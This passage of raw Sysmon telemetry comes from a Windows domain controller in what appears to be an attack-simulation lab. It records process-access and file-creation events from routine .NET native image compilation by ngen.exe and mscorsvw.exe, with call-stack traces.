ws\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006029Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.164{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456C-6000-E101-000000009A01}2832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006028Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.164{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-456C-6000-E101-000000009A01}2832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006027Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.164{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456C-6000-E101-000000009A01}2832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006026Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.133{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456C-6000-E001-000000009A01}4156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006025Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.117{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-456C-6000-E001-000000009A01}4156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006024Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.117{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456C-6000-E001-000000009A01}4156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006023Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.054{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456C-6000-DF01-000000009A01}592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006022Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.039{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-456C-6000-DF01-000000009A01}592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006021Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.039{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456C-6000-DF01-000000009A01}592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006020Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.992{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456B-6000-DE01-000000009A01}4216C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006064Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:49.961{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456D-6000-EC01-000000009A01}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006063Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:49.945{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-456D-6000-EC01-000000009A01}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006062Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:49.945{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456D-6000-EC01-000000009A01}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006061Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:49.883{08A6967A-456D-6000-EB01-000000009A01}4940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\134c-0\Microsoft.Transactions.Bridge.Dtc.dll2021-01-14 13:21:49.883 10341000x80000000000000006060Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:49.648{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456D-6000-EB01-000000009A01}4940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006059Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:49.633{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-456D-6000-EB01-000000009A01}4940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006058Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:49.633{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456D-6000-EB01-000000009A01}4940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006057Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:49.570{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456D-6000-EA01-000000009A01}2948C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006056Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:49.570{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-456D-6000-EA01-000000009A01}2948C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006055Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:49.570{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456D-6000-EA01-000000009A01}2948C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006054Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:49.476{08A6967A-456C-6000-E901-000000009A01}876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\36c-0\Microsoft.Transactions.Bridge.dll2021-01-14 13:21:49.476 11241100x80000000000000006071Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:50.945{08A6967A-456E-6000-EE01-000000009A01}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c34-0\Microsoft.VisualBasic.Activities.Compiler.dll2021-01-14 13:21:50.945 10341000x80000000000000006070Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:50.289{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456E-6000-EE01-000000009A01}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006069Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:50.289{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-456E-6000-EE01-000000009A01}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006068Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:50.289{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456E-6000-EE01-000000009A01}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006067Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:50.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456E-6000-ED01-000000009A01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006066Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:50.039{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-456E-6000-ED01-000000009A01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006065Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 